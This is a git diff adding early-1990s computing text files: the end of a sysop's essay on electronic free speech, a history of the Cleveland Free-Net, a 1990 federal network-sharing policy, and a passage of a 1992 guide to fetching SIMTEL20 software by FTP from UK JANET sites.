ALWAYS HAVE IN THE PAST - BEEN +WILLING TO USE CRIMINAL LAWS TO INTIMIDATE THE INNOCENT IN PURSUIT OF THE +GUILTY. ONLY TOTALITARIAN SOCIETIES CONDONE THE USE OF SUCH TECHNIQUES. + + TELEPHONE COMPANIES CERTAINLY HAVE A PROBLEM IN STOLEN CREDIT CARDS. WE +SHOULD HELP THEM SOLVE THAT PROBLEM IN THE WAY CITIZENS HAVE ALWAYS DEALT WITH +PUBLIC CRIME IN FREE SOCIETIES - BY VOLUNTARILY REPORTING IT, OR DISUADING +OTHERS FROM ENGAGING IN IT WHEN WE ENCOUNTER IT. BUT WE SHOULD RISE UP AND +RESIST ANY EFFORT OF POWERFUL COMPANIES PRESSURING GOVERNMENT BODIES INTO +COMPELLING US UNDER LEGAL THREAT OF PUNISHMENT TO SPY ON ELECTRONIC +ACQUAINTANCES, SUSPECT ALL COMPUTER CONVERSATIONS, OR BE HELD RESPONSIBLE FOR +THE ACTS OF KEYBOARD VAGRANTS PASSING THROUGH OUR ELECTRONIC NEIGHBORHOODS. +THAT WOULD TRUELY USHER IN THE ORWELLIAN NIGHTMARE. + + COMPUTER LITERACY CAN NO LONGER BE LIMITED TO DISCUSSIONS OF PROGRAMMING, +PERFORMANCE, AND PRICES. IT NOW MUST INVOLVE THE UNDERSTANDING BY DISTRICT +ATTORNEYS, JUDGES, JURIES, LAWMAKERS AND ORDINARY CITIZENS EVERYWHERE OF THE +IMPLICATIONS FOR OUR MOST PRECIOUS CIVIL LIBERTIES OF CASES INVOLVING THESE +UBIQUITOUS SILICON INSTRUMENTS. THESE TOOLS OF THE MIND HOLD A GREATER PROMISE +OF BRINGING US CLOSER TO THE IDEALS OF INDIVIDUAL LIFE, LIBERTY, AND THE +PURSUIT OF HAPPINESS, SOUGHT BY THE FOUNDERS OF THIS REPUBLIC THAN ANY TOOL +INVENTED BEFORE OR SINCE. BENJAMIN FRANKLIN WOULD HAVE BEEN THE FIRST OWNER OF +A MICROCOMPUTER. THOMAS JEFFERSON WOULD HAVE WRITTEN THE DECLARATION OF +INDEPENDENCE ON A WORD PROCESSOR. TOM PAINE WOULD HAVE FIRST PUBLISHED HIS +'COMMON SENSE' ON A LOCAL COMPUTER BULLETIN-BOARD. ELECTRONIC DEMOCRACY IS +BOUND TO BE BOISTEROUS AND UNTIDY, AND ATTRACT COMMON CROOKS IN ITS EXCITING +INFANCY. BUT I DON'T WANT ANY LEGAL RED COATS CARRYING OUT THE +SPEECH-SUPRESSING WISHES OF CORPORATE KINGS GEORGE IN THE NAME OF LAW AND ORDER +AGAINST WE CITIZENS OF THE COMPUTER AGE SO LONG AS I HAVE A CURSOR WITH WHICH +TO OPPOSE THEM. + + PASS THE WORD, MODEM MINUTEMEN! AMERICANS MUST HAVE FREEDOM OF ELECTRONIC +SPEECH! + +DAVID R HUGHES +SYSOP +THE OLD COLORADO CITY +ELECTRONIC COTTAGE + +======================================= + \ No newline at end of file diff --git a/textfiles.com/computers/freenet.cap b/textfiles.com/computers/freenet.cap new file mode 100644 index 00000000..0d89dae1 --- /dev/null +++ b/textfiles.com/computers/freenet.cap @@ -0,0 +1,239 @@ +The Concept of Community Computing + + Since 1985, Case Western Reserve University has been experimenting +with free, open-access, community computer systems as a new communications +and information medium. + + In effect, these systems represent a new application in computing. A +multi-user computer is established at a central location in a given area +and the machine is connected to the telephone system through a series of +devices called modems. Running on the machine is a computer program +that provides its users with everything from electronic mail services to +information about health care, education, technology, government, +recreation, or just about anything else the host operators would like to +place on the machine. + + Anyone in the community with access to a home, office, or school +computer and a modem can contact the system any time, 24 hours a day. +They simply dial a central phone number, make connection, and a series of +menus appears on the screen which allows them to select the information +or communication services they would like. All of it is free and all of it +can easily be accomplished by a first-time user. + + The key to the economics of operating a community computer system is +the fact that the system is literally run by the community itself. +Everything that appears on one of these machines is there because there +are individuals or organizations in the community who are prepared to +contribute their time, effort, and expertise to place it there and operate it +over time. This, of course, is in contrast to the commercial services +which have very high personnel and information-acquisition costs and +must pass those costs on to the consumer. + + Couple this volunteerism with the rapidly-dropping costs of computing +power, the use of inexpensive transmission technology, and the fact that +the necessary software to operate these systems is available for low +cost--and public access computing becomes an economically-viable entity. + +Case Reserve's Involvement in Community Computing + + The University's involvement in the development of community +computer systems has its origins in an experiment conducted in the School +of Medicine in the fall of 1984. Dr. Tom Grundner of the Department of +Family Medicine, set up a single phone line, computerized, "Bulletin Board" +system called "St. Silicon's Hospital and Information Dispensary" to test +the efficacy of using this medium as a means of delivering general health +information to the public. The heart of the system was an interactive area +where lay people could call in using their home, school, or business +computers, leave medically-related questions, and have them answered by +a physician within 24 hours. The experiment proved so successful that it +attracted the attention of the Information Systems Division of AT&T and +the Ohio Bell Telephone Company, who supported a larger project to expand +and develop this interactive concept. + + Based on these donations, Dr. Grundner began work on a full-scale +"community computer system" on an AT&T 3B2/400 computer with 10 +incoming phone lines. This pilot project was designed to serve as a +community information resource in areas as diverse as law, medicine, +education, arts, sciences, and government--including free electronic mail +services for the citizens of northeast Ohio. On July 16, 1986, this system, +called the Cleveland Free-Net was opened by Ohio Governor Richard +Celeste and Cleveland Mayor George Voinovich and the project was +officially underway. + + During its prototype stage, the Cleveland Free-Net gathered over 7000 +registered users from throughout the Cleveland metropolitan area and +handled between 500-600 calls per day on 10 incoming phone lines. In +1989, however, it moved out of prototype in a big way. + + A new system was designed around six IBM-RT (Model 135) computers +which would be linked together so that, from the user's standpoint, they +would appear as one big machine. This new system would provide the +Cleveland Free-Net with 96 megabytes of RAM (96 million characters of +Random Access Memory), 2.3 gigabytes of hard disk storage (2.3 billion +characters of hard disk), and would be capable of supporting up to 360 +simultaneous users. + + In August of 1989 the Cleveland supersystem opened with 32 phone +lines on its way to a projected 96 lines by the end of the year. In August +also, the Free-Net was connected to the CWRUNET fiber-optic campus +network. This merger of a community computer system with a campus +network is yet another first and provides an entirely new model for +campus network development. + + By the end of 1992 the Cleveland Free-Net had grown to over 36,000 +active accounts handling over 11,000 logins a day. + +Development of the Concept + + As a result of the experience we have gained in working with and +developing these systems, several conclusions regarding community +computing can be drawn. + + First, it is clear that these community computers represent the leading +edge of what can only be described as a new telecommunications medium. +Telecomputing is not radio, not television, not print, but has +characteristics of all three plus some additional ones of its own. This +fact alone will inevitably lead to developments and uses that we cannot +now even begin to imagine. + + Second, experience in northeast Ohio indicates that a critical mass of +people now exist who are prepared to utilize this new medium. As more +and more modem-equipped microcomputers penetrate the home and +especially the work environment, the utility of public-access +computerized information services goes up. We have no doubt that this +consumer interest and ability to utilize this technology exists at least as +much in other parts of the country as it does in northeast Ohio. + + Third, there is a certain sense of inevitability to the development of +community computing. Simply stated, given the directions now being taken +by the computer and communications industry, we find ourselves unable to +imagine a 21st century in which we do NOT have community computer +systems, just as this century has its public libraries. Moreover, we +believe that the community computer, as a resource, will have at least as +much impact on the next century as the public library has had on ours. + + There currently exists an entire generation in our secondary schools +and colleges, for example, that have come to know the microcomputer as a +routine personal productivity tool. By the turn of the century, these people +will be in a work place where microcomputers and computerized +information retrieval will be ubiquitous. This, in turn, cannot help but lead +to a demand for similar functions in the home, even as the telephone +migrated from being primarily a business tool to a home utility. The +process, in effect, feeds on itself. Indeed, several sources are predicting +that by the year 2000, over 32,000,000 households (40% of all households) +will have some kind of in-home computing technology or information +service. + + But perhaps the best way to illustrate the development of community +computing is by analogy to the development of the public library system in +our country. In the middle of the last century there was no such thing as +the free public library. Eventually the literacy rate increased enough (and +the cost of books decreased enough) that the public library became +feasible. In this century, we believe we have reached the point where +computer "literacy" has increased enough (and the cost of equipment +decreased enough) that a similar demand has formed for free, public- +access, community computer systems. + +A Civic Utility: Potential Impact on the Community + + Who, exactly, benefits from community computing? To cite just a few +examples: + + % The Citizens: First and foremost, these community computer systems +open up information services to very large populations that would +otherwise not be able to afford it. The cost of utilizing a Free-Net +community computer consists of the cost of having standard telephone +service in the home or business, plus the price of the equipment needed to +get online. This equipment is now well under $200 virtually anywhere, and +that is assuming the person purchases new. If a person wishes to attend a +few garage sales, flea markets, or computer fairs, it could be +considerably less. + + % Public and Private Schools: Via community computers, school +systems finally have a cost-effective way to teach telecomputing to their +students, thereby sending a new generation of information-literate +citizens into the work force. In addition, these systems allow students, +teachers, parents, and administrators to communicate with each other and +have access to information bases of interest and importance. + + % Government: Community computers provide citizens with an +inexpensive and rapid way to make contact with their elected +representatives at the city, county, state, and national levels--contacts +which include everything from obtaining information on governmental +services to providing access to tax-payer supported, governmentally- +produced databases. It should also be pointed out that these +communications are not one way. Elected representatives and other +officials also have the ability to electronically communicate with their +constituents. + + % Small- and Medium-sized Businesses: Most major corporations have +electronic mail and other computer-driven information services at their +disposal. Most small- and medium-sized businesses do not. With a Free- +Net system in place, these smaller enterprises are finally able to afford +to link their operations together via the free electronic mail services +found on these systems and have access to a variety of useful business +databases--something that cannot help but improve the business +infrastructure of any city. + + % The Agricultural Community: Among the segments in our society that +were the first to embrace computing were our farmers. The reason was +obvious. Farmers are business people too, but they have the disadvantages +of, in general, being dispersed over wide geographic areas. A Free-Net +system in a central location in a county allows the agricultural +community to access common information bases, share solutions to farm- +related problems, access up-to-date crop and price information, and make +electronic connection with the County Agent and each other--all without +ever leaving home. + + % The Telecommunications and Videotex Industry: For years the +commercial videotex industry has been dividing, sub-dividing, and sub-sub- +dividing essentially the same "up-scale" demographic group: $50,000+ +yearly household incomes, very well educated, overwhelmingly white, and +overwhelmingly male. If the industry is to survive and flourish, however, +it is going to have to find a way to penetrate the middle class with its +services. Free-Net community computers do exactly that. On the Cleveland +system, for example, we draw as many users out of the demographically +blue collar areas of the city as we do out of the wealthier sections. +Demographic penetration such as this, on a nationwide basis, is vital if +the telecomputing and videotex industry is to survive into the 21st +century. It is also important to the telephone industry, which has spent +millions of dollars on "intelligent gateway" technology, that videotex +flourish and that their services be used. + + % Community Organizations and Institutions: Each Free-Net is set up +using an "Electronic City" motif. That motif was not selected by accident. +To one degree or another, virtually every institution in society has an +information dissemination function of some kind--a need to tell others +about itself and share its knowledge. The Free-Net makes it possible for +any and all of them to utilize a new medium to accomplish that goal. From +artistic and cultural organizations to medical institutions to hobbyists of +all kinds, all can find a place on a community computer. + + THE CLEVELAND FREE-NET COMPUTER COMPLEX: + + The Cleveland Free-Net is not a single computer. It is a collection +of more than a dozen machines all operating in coordination with +each other, and all maintained on the campus of Case Western Reserve +University by CWRU's Information Network Services group. + + At the heart of the system are machines from several different vendors. +These machines have been linked together via an ethernet connection +so that, from the users standpoint, they appear as one large machine. + + Access to the Free-Net is provided via three methods. The first +is via asynchronous modem where phone lines are available for +community access. More phone lines and modems may be added as +community demand increases. The second method is via both the +fiber-optic lines and modems of CWRUnet, the university's new +campus information network. + + The Free-Net is also available to users around the world via the +university's connection to the Internet. The Internet is a collection +of thousands of computer systems located in almost every part of the +world. + +[note: all references to which vendors we are using and how many phone + lines we have were deleted because things are growing so fast we can't + keep this document up to date] + + \ No newline at end of file diff --git a/textfiles.com/computers/fricc b/textfiles.com/computers/fricc new file mode 100644 index 00000000..03421784 --- /dev/null +++ b/textfiles.com/computers/fricc @@ -0,0 +1,80 @@ +Date: 2 Jul 90 +From: Bill Bostwick + + + FRICC POLICY ON INTERCONNECTIVITY AND RESOURCE SHARING + + +Within the participating government agencies of the Federal Research + +Internet Coordinating Committee (FRICC), there exist today varying policies + +on the acceptable use of each agency's networking resources. This policy + +statement set forth by the FRICC will establish both a short-term and + +longer-term policy agreed to by the FRICC participating members. Mid-level + +networks that use FRICC shared resources must conform to this policy. + + + +For the short term, the FRICC policy is relatively simple and is primarily + +motivated by the cost savings to the Federal government. This policy will + +be in effect from mid fiscal year 1989 through fiscal year 1991. + + + + 1. The member agencies of the FRICC agree to share the use of network + + data links, both domestic and foreign, whenever possible. This + + will include the gatewaying of major backbone resources of the + + participating agencies within the continental United States. + + + + 2. The member agencies of the FRICC agree to carry all traffic that + + meets the acceptable use policy of the originating member agency. + + In the least restrictive case, this includes all bona fide + + researchers and scholars, public and private, from the United + + States and foreign countries unless denied access by national + + policy. + + + + 3. The member agencies of the FRICC will maintain the prerogative to + + limit or shut off the shared use of interconnected resources + + during periods when guaranteed bandwidth might be required by the + + proprietary agency. + + + + 4. The FRICC will comply with OMB Circular A-130 through estimates of + + shared traffic and ongoing research and development enabling the + + identification and metering of traffic through gateways or other + + means. + + +For the long term, the FRICC policy is a transition to a National Research + +Network to be operated commercially. The FRICC will support the research + +and development required for the administrative policy controls and counting + +mechanisms that will make this transition possible. + diff --git a/textfiles.com/computers/ftp2uk23.inf b/textfiles.com/computers/ftp2uk23.inf new file mode 100644 index 00000000..3f781daa --- /dev/null +++ b/textfiles.com/computers/ftp2uk23.inf @@ -0,0 +1,1687 @@ +FTP2UK23.INF SIMTEL20 by FTP from UK JANET sites + +Notes for PC/MSDOS users at UK JANET sites - last revised 27 Apr 92 + +Some of the methods below are no longer in my current repertoire. If you +think the advice has become out of date, please send me a message with +details. + Hylton Boothroyd, Warwick Business School, bsrdp@warwick.ac.uk + +UK readers can find the latest version of this file in the directory +ibmpc/simtel20/info at uk.ac.ic.doc.src +------------------------------------------------------------------------ +Contents: + + 0. Background to this file + 0.1 JANET (NIFTP) methods v. Internet FTP + + 1. Practical alternatives, and why + 1.1 Lancaster + 1.2 Imperial College, London + 1.3 TRICKLEs + 1.4 FTP from mirrors and quasi-mirrors outside the UK + 1.5 FTP variations available + + 2. Getting a file from SIMTEL20: two-stage FTP via London + 2.1 Scope of advice + 2.2 Authorizations + 2.3 Outline and limitations + 2.4 Getting information files before you start + 2.5 An annotated example of Warwick - NSF.SUN(London) - SIMTEL20 + + 3. Getting a file from SIMTEL20: FTP direct + 3.1 Scope of advice + 3.2 Authorizations + 3.3 Outline and limitations + 3.4 Getting information files before you start + 3.5 Automation of FTP file collection + + 4. Getting a file from SIMTEL20: one-step file request via FT-RELAY + 4.1 Scope of advice + 4.2 Authorizations + 4.3 Outline and limitations + 4.4 Getting information files before you start + 4.5 An example of a request to FT-RELAY + + 5. File history + +------------------------------------------------------------------------ + 0. Background to this file +--------------------------- +These notes were originally prepared for Keith Petersen, the SIMTEL20 +archivist, to meet a steady stream of requests for information from UK +JANET sites with the basic query: + Can I get SIMTEL20 files in the UK by FTP? How? + +Now that all JANET sites can get SIMTEL20 files over JANET from the +SIMTEL20 collection maintained at Imperial College in London, the advice +here has served its original purpose. However, until late 1993, and +perhaps beyond that, the working methods discussed in this file will +continue to be of interest to UK users wanting files publicly available +by FTP from other non-UK sites. + +When FTP is mentioned on the net by people outside the UK, it usually +means the programme at a site on Internet (a network of networks) that +can be used + * to establish a connection with a distant site, + * to inspect the contents of distant directories, + * to transfer files along the connection. +When networks and sites are not busy it is fast and fluent. + +JANET is too unlike other networks for it simply to join Internet en +bloc. JANET sites therefore either have to join Internet individually in +their own right or have to rely on indirect access. Until mid-1991, +scarcely any JANET sites were on Internet. By the end of 1993 most JANET +sites will have joined, though cost may keep some sites off Internet +indefinitely. + +If you are at a JANET site that is already on Internet, the flavour of +working methods can be sampled from sections 2.5.4 (manual interactive) +and 3.5 (manually started scripts and automatically repeated scripts). +And you can take your advice on FTP from anywhere in the world. + +If you are at a JANET site that is not yet on Internet you have to +connect with special Internet interfaces at other UK sites to act as your +end of the Internet connection. You can get an idea of the several +stages of manually collecting a file from SIMTEL20 to your PC from the +long annotated example in section 2.5, which is mostly a straight account +of my first experience of FTP in all its JANET awkwardness but also +includes a sprinkling of afterthoughts. + +Unfortunately, connections between JANET sites are not produced by a +single widely implemented package. There is a medley of packages with +little in common in their user interfaces. And there is only patchy +guidance on what to put into each package to produce the desired JANET +message. A complete advice file on indirect connection with Internet +would have to have a complete set of recipes for each package in the +medley. That is beyond my capacity. So the accounts here are based on +my preferred connection to the world: + + before Internet at my site - + + PC+Kermit -----> Unix host ----+---> JANET -> Internet interfaces + | + PC+Rainbow --+ + + [ I already had many utilities on the unix intermediary, and + liked its multiple streaming of parallel jobs, so I was not + drawn to the obvious alternative + PC+Rainbow ------------------> JANET -> Internet interfaces ] + + after Internet at my site - + + PC+Kermit -----> Unix host ----+---> Internet + | + PC+Rainbow --+ + +PC+Kermit leaves plenty of room on a standard 640K PC for doing things at +the PC end during a connection. PC+Rainbow uses so much space that only +the most trivial operations are feasible - its chief advantages are +built-in methods for direct use of JANET and its speed of file transfer. + +Since UK JANET methods can be awkward to use, there is some advantage in +wrapping up the painful details in scripts and/or set-up recipes once you +have established them. So far I only have recipes for using unix hosts. +Brief examples are included below, but more ambitious methods are in +the companion file + pd1:FTP2UK23.ZIP . + +In using the advice below: + * be prepared to replace my account of what I do with something + suited to your own hardware and software; + * replace the variants of my email address with similar variants of + your own. + + +0.1 JANET (NIFTP) methods v. Internet FTP +----------------------------------------- +There are two modes of linking with a distant site: + * interactive manual control, + * sending a complete request message. + +In FTP there is no difference in what can be done in the two modes - +a complete request message simply mimics interactive manual control. + +On JANET there are differences in what can be done in the two modes, and +you need to switch between them. At best the two modes are managed +within a menu-driven front-end, as in the PC-Rainbow package. At worst +there is an unrelated and different-looking utility for each mode, as on +a typical unix host. + +Interactive manual control offers the following basic facilities: + FTP JANET + Yes Yes List a distant directory on screen + No* Yes Read a distant text file on screen + Yes No Have a distant text/binary file sent to you + Yes No Have a distant directory sent to you as a file + No Yes Direct access to remote site from PC (via Rainbow) + + * on some systems, but not on the London interface, FTP allows + quick and easy interruption to inspect files collected from a + distant site. + +A stand-alone request message offers the following basic facilities: + FTP JANET + Yes Yes Have a distant text/binary file sent to you + Yes No* Have a distant directory sent to you as a file + No Yes Direct file receipt on PC from remote site (via Rainbow) + + * many JANET sites partly compensate for the lack of + directory-as-file by periodically updating separate textfiles of + directory listings, but there is no standard method for naming + and locating them. + +----------------------------------------------------------------------------- +1. Practical alternatives, and why +----------------------------------- +SIMTEL20 has probably the largest publicly-accessible actively-managed +up-to-date collection of serious MSDOS software in the world, both public +domain (PD) and shareware (SW). BUT ... + + * a large mature UK repository of PC software now exists at + Lancaster, with full time staff who are: + - pro-active in collecting it from sites like SIMTEL20 and + cataloguing it, + - funded partly to avoid the overloading of gateways to + international networks and the international networks + themselves; + + * a reasonable mirror of SIMTEL20's pd1: directory is now + maintained at Imperial College, London; + + * an email service of SIMTEL20 files is still available via a + network of caches/servers around Europe and near-Europe - the + TRICKLE servers; + + * it is often easier and more reliable to connect with mature + non-UK sites that keep up-to-date copies of SIMTEL20 files. + +I don't aim to include stand-alone guides to alternatives to SIMTEL20, +but here in section 1 are some pointers to those that seem to be reliable +together with a quick overview of the three methods available for +reaching SIMTEL20 and other FTP sites. + + +1.1 Lancaster +------------- +The "National Software Archive" at Lancaster offers in its own format +virtually everything that is added to SIMTEL20. The archive is +accessible to *all* JANET users by email and JANET methods. In November +1991 it became accessible by FTP. + +To get started either send an email message of the form: + From: bsrdp@uk.ac.warwick.cu + To: archive-server@uk.ac.lancs.pdsoft + Subject: Anything you like, or leave out the whole line + + send help + +or call the archive interactively over JANET and follow the instructions +on screen - on my unix host I simply need to enter + pad lancs.pdsoft +( a limited range of unix-like commands is available: for example, 'more' + but not 'less'); + +or, if you have direct FTP, use methods similar to the manual interactive +method described in section 2.5.4 or to the automated methods described +in section 3.5 - a suitable first script would be: + verbose + open 148.88.64.2 + user anonymous bsrdp@warwick.ac.uk + ascii + dir * lancs.dir + get docs/pdintro lancs.docs.pdintro + get micros/ibmpc/dos/index lancs.dos.index + bye + +Good and bad features from the point of view of SIMTEL20 users are: + + has a separate standardized descriptive file for each + application, which + % often tells you enough to avoid an unsuitable archive, + % reports the commercial status - PD or which of the many + varieties of SW - in April 1992 about 45% of the MSDOS + list was SW; + + publishes four regular email newsletters ( dos, windows, os2, and + deskview ) which include the information files for the latest + additions together with full pathnames; + - is a chronological collection with uninformative directory names + and file names - I find I need both a printed and a local online + copy of + /micros/ibmpc/dos/index + to navigate comfortably - if you accidentally call + dir /micros/ibmpc + you will after some minutes get a directory listing of about 2000 + names running from f001 to h999 and be no wiser; + - has no cross-referencing to SIMTEL20; + - repackages all archives in a .BOO format, but offers DEBOOing + tools if your site does not have them; + - lags perhaps 7/10 days behind SIMTEL20, but ... + + accepts requests for expediting; + + avoids adding to traffic on international networks, + - low rate of first time FTP connection. + +If you are at a JANET site without Internet FTP, then: + + physically available 24 hours a day, + + high rate of first time connection. + + +1.2 Imperial College, London +---------------------------- +The UKUUG archive at Imperial College started a new section in August +1991. By April 1992 a complete set of MSDOS files from SIMTEL20 appeared +to be in place. + +The archive is accessible to *all* JANET users by email and JANET +methods, and is also accessible by FTP. JANET users should make this the +standard site for collecting their up-to-date copy of + pd1:SIMIBM.ARC +which is held as + ibmpc/simtel20/filedocs/simibm.arc . + +To get started either send an email message of the form: + From: bsrdp@uk.ac.warwick.cu + To: info-server@doc.ic.ac.uk + Subject: Anything you like, or leave out the whole line + + request: index + topic: help + request: end + +or call the archive interactively by JANET methods outside office hours +and follow the instructions on screen - on my unix host I simply need to +enter + pad ic.doc.src +( a rather wider range of unix-like commands is available than at + Lancaster, including 'less' and file location calls); + +or, if you have direct FTP, use methods similar to the manual interactive +method described in section 2.5.4 or to the automated methods described +in section 3.5 - a suitable script to check the current range of +directories would be + verbose + open src.doc.ic.ac.uk + user anonymous bsrdp@warwick.ac.uk + dir ibmpc/simtel20/. ic.simtel20.dir + bye +( the numeric form of the address is 146.169.3.7, and the address you + offer as your password must include @ ). + +Good and bad features from the point of view of SIMTEL20 users are: + + uses SIMTEL20's directory structure and filenames, so + announcements on comp.binaries.ibm.pc.archives can be + translated directly into requests; + - at April 1992 additionally carried about 20% extra detritus from + months of development using buggy communications and/or buggy + local name processing, including: + % many extra buggily-named directories with old and/or + buggily-named versions of SIMTEL20 files, + % a tendency to miss the deletion of superseded versions of + software within current SIMTEL20 directories, + % a scattering of programmes which have additionally or + alternatively been subject to unix compress, + so + % it can confidently be used to call files for which you have a + correct directoryname+filename from SIMIBM.ARC, + % it is best not used for browsing until it is tidier - get an + up-to-date copy of SIMIBM.ARC and browse in that; + + lags only one or two days behind files being added to SIMTEL20 + + has a high rate of first-time connection; + + avoids adding to traffic on international networks. + +If you are at a JANET site without Internet FTP, then: + - physically unavailable for manual interactive working during + normal office hours (0830-1730 Mon-Fri), + + high rate of first time-time connection. + + +1.3 TRICKLEs in Europe and near-Europe +-------------------------------------- +There is a slowly changing list of about 10 sites on the EARN/BITNET +network in Europe, ranging from Spain to Denmark to Israel, with +automatic servers which together manage a substantial cache of SIMTEL20 +material of current interest. The cache has no duplication in it, except +transiently during file distribution. + +I think it will now mainly be of interest only if the Imperial College +mirror becomes unavailable for any reason. But some users in unusual +circumstances may still need it. + +Although the TRICKLE system is primarily for direct connection of sites +on the EARN/BITNET network, one of the TRICKLEs, currently that in +Austria, provides a complete email service for UK users. On receiving a +request for a SIMTEL20 file, the Austrian TRICKLE will: + * mail it if it is in the Austrian cache, + * ask each other TRICKLE to mail it, and report, + * if all report negatively, place an order for the file and mail it + on arrival. + +To get started, send an email message of the form + From: bsrdp@uk.ac.warwick.cu + Reply-To: bsrdp%cu.warwick.ac.uk@UKACRL + To: trickle@awiwuw11.earn + Subject: Anything you like, or leave out the whole line + + /help + +and in the help file that arrives ignore all references (TELL etc) to the +direct access methods available to sites that are on EARN. You might be +OK without the Reply-To line. I made it standard when it became clear +that the TRICKLEs were not always in a state where they could form an +adequate version of my address - UKACRL is the EARN interface for all +JANET sites. + +Some good and bad features from the point of view of SIMTEL20 users are: + + uses SIMTEL20's directory structure and filenames, so + announcements on comp.binaries.ibm.pc.archives can be + translated directly into requests; + - usually lags about 3 days behind newsgroup announcements in + updating its directory and accepting requests, but has occasional + hiccoughs when it lags by another week, particularly at periods + of excitement and/or crisis on the networks; + + exact copies of SIMTEL20 .ZIP files and .ARC files are translated + into mailable form, often in several parts, and arrive with no + effort on your part, although ... + - it can be the weekend before the big parts arrive in term time ( + if a file is sent in n parts, the first n-1 are big and the final + part may be) + - UK users must specifically ask for mailings of archive files + (.ARC, .LZH, .ZIP, .ZOO ...) to be xxencoded, and must have the + tools for xxdecoding, which can can be a bit messy - downloading + the set of separate parts to your PC and using Richard Mark's + uudecode + pd1:UUEXE510.ZIP + is an alternative to writing supporting perl/awk scripts for a + unix host. + + +1.4 FTP from mirrors and quasi-mirrors outside the UK +----------------------------------------------------- +Sites in various parts of the world aim at keeping reasonably up-to-date +copies of SIMTEL20's MSDOS files and offering an FTP service to the world +at large. They may be of little interest once the Imperial College +coverage is thoroughly debugged, except insofar as they are actively +managed collections. + +Mirror sites, a minority, have: + * a tree of directories somewhere in their own directory structure + that exactly matches the pd1: directory tree on SIMTEL20, + * files that are exact copies of the files on SIMTEL20, + * an identical set of files to those on SIMTEL20, typically managed + by automatic overnight off-peak calling of new files, and + therefore typically in a state that lags a day or two behind + SIMTEL20. + +What I prefer to call quasi-mirror sites, although they are usually +described as mirrors, depart in some respects from being true mirrors, +but may have other qualities to recommend them. The Imperial College +collection of SIMTEL20 files described in section 1.2 is intended to be a +true mirror. + +Mirrors and quasi-mirrors do not usually have the same operating system +as SIMTEL20, so the appearance of directory names and filenames is +somewhat different. For example, at the first site described below the +SIMTEL20 file + pd1:SIMIBM.ARC +is held as + /mirrors/msdos/filedocs/simibm.arc + +Four unix sites are worth looking at from the UK, and can be accessed by +the methods for accessing SIMTEL20 in sections 2, 3, and 4 below. + +wuarchive.wustl.edu + Offers a true mirror in its directory + /mirrors/msdos + and + + usually lags by only about one day, + + has a high rate of first-time connections, + + usually operates more quickly than other sites, + + in 1991 was the source for the mirror at Imperial College, + London. + +oak.oakland.edu + Offers a true mirror in its directory + /pub/msdos + and + + usually lags by no more than a day, and is managed by the SIMTEL20 + msdos archivist, + - has a lower rate of first-time connections than wuarchive. + +nic.funet.fi + Offers a quasi-mirror in its directory + /pub/msdos + though the directory also has several sub-directories not related to + material from SIMTEL20's pd1: directory. + Some good and bad features from the point of view of SIMTEL20 users + are: + - within /pub/msdos there is an extra layer of sub-directories into + which the SIMTEL20 directories are grouped, though ... + + a group of thematically related directory names can then + conveniently be presented in a single screenful, + - .ARC and .ZIP files are repackaged into .LZH archives, which + requires yet another verification tool on a unix host - however, + once you have the .LZH archive on your PC ... + + archives in .LZH format are a little smaller; + - lags behind wuarchive.wustl.edu + +garbo.uwasa.fi + Offers a quasi-mirror in its directory + /pc + though the directory also contains some non-SIMTEL20 material. + Some good and bad features from the point of view of SIMTEL20 users + are: + + competes to make most worthwhile things available quickly, and + indeed to persuade software authors to make it a repository of + first resort, but ... + - adds only a subset of what is added to SIMTEL20, though I guess + that users will find at least 90% of what they want; + + holds only about 20% of what is on SIMTEL20 - as an active + utility writer the moderator excludes also-ran's and me-too's, so + the average quality of general utilities is high; + - holds only about 20% of what is on SIMTEL20 - so some + applications topics are entirely missing; + - repacks some .ARCs to .ZIPs, with SIMIBM.ARC as + /pc/filelist/simibm.zip ; + +/- accepts some .LZHs ( see nic.funet.fi above for comments ) + - uses a thematic directory structure coarser than that of + SIMTEL20, with subtly different directory names and sometimes + different filenames, but ... + + announces details of additions quickly, with full pathname (but + look out for corrections) and often with evaluative comments, on + comp.binaries.ibm.pc.archives; + + maintains an index list + /pc/filelist/garboidx.arc + with brief descriptions similar to SIMIBM.IDX but perhaps a + little more evaluative; + - has no cross reference from SIMTEL20 pathnames; + - often (50%+ of my requests) declares itself unable to provide a + directory listing using 'dir' (a persistent bug) though a list of + names-only is available using 'ls'; + - despite being geographically nearer to the UK is connected + through busy networks that make file transfers noticeably slower + than from wuarchive and oak. + + +1.5 FTP variations available +---------------------------- +Distant connection by FTP is seductive, so it is perhaps worth saying: + * the software and hardware at FTP sites are not usually maintained + principally for the benefit of distant callers, though in the + long run there is a very rough quid pro quo in what is made + available to archive sites by the networking community; + * even if you are not physically prevented from accessing a distant + site during its normal daytime office hours, you should try to + respect requests for considerate use; + * operators and/or funders of distant sites may call, Enough, and + pull the plug. + +For JANET users the three methods of FTP connection currently available +are: + +two-stage connection through the London FTP interface +----------------------------------------------------- + + available to all JANET sites, + + well-established, + + allows you during a single FTP session in London to move easily + between: + % listing directory contents (complete with files sizes), + % pulling a copy of any file to London, + - everything has to be transferred from London to your own site + before you can inspect it, + - has no facility for you to build supportive scripts for pulling + files to London or for sending them to your own site, + - often busy and often with limited capacity for incoming files, + though this is temporarily easing as sites with their own + Internet connections discontinue their traffic, + - requires two substantially different methods of distant computer + access and file transfer, one within the UK to reach London, and + ordinary Internet FTP from London to the rest of the world, + + direct PC-London access with the UK 'Rainbow' package from + certain types of local network; + +ordinary FTP +------------ + - not yet available at some JANET sites, + + should be relatively bug-free proven technology, + + allows you during a single manually controlled FTP session to + move easily between: + % listing directory contents (complete with files sizes), + % pulling a copy of any file, + % briefly inspecting pulled files, + + can be automated to various degrees; + +one-stage file-relay service via FT-RELAY +----------------------------------------- + + available to all JANET sites, + + delivers files to your own site, and operates the FTP connection + itself, + + very fast, like direct FTP, + IF lines to FT-RELAY are free + AND FT-RELAY is not busy + AND the networks to the remote site are not busy + AND the remote site can accept you, + - experimental, with scope of future behaviour not yet defined, and + fairly sharp changes in the degree to which it will persist with + a request - at a particular test date in August 1991 I noted: + % each request for a directory listing and each request for a + file is the subject of a separate message to FT-RELAY and + separate re-connection to the remote site, + % directory listings lack file sizes, + % terminates the request under many conditions where I would + want it to persist - can be very tedious, + % some key online descriptions only in a news file that has + garbled characters in key passages. + +These three alternatives are described more fully in Sections 2 ,3 and 4. + + +-------------------------------------------------------------------------- +2. Getting a file from SIMTEL20: two-step FTP via London +--------------------------------------------------------- +This section has the fullest sequence of advice, since it is the only +method by which all JANET users can achieve interactive FTP connection. +To avoid repetition, later sections in places point back to section 2. + +2.1 Scope of advice +------------------- +For UK people at any JANET site who + * want MSDOS 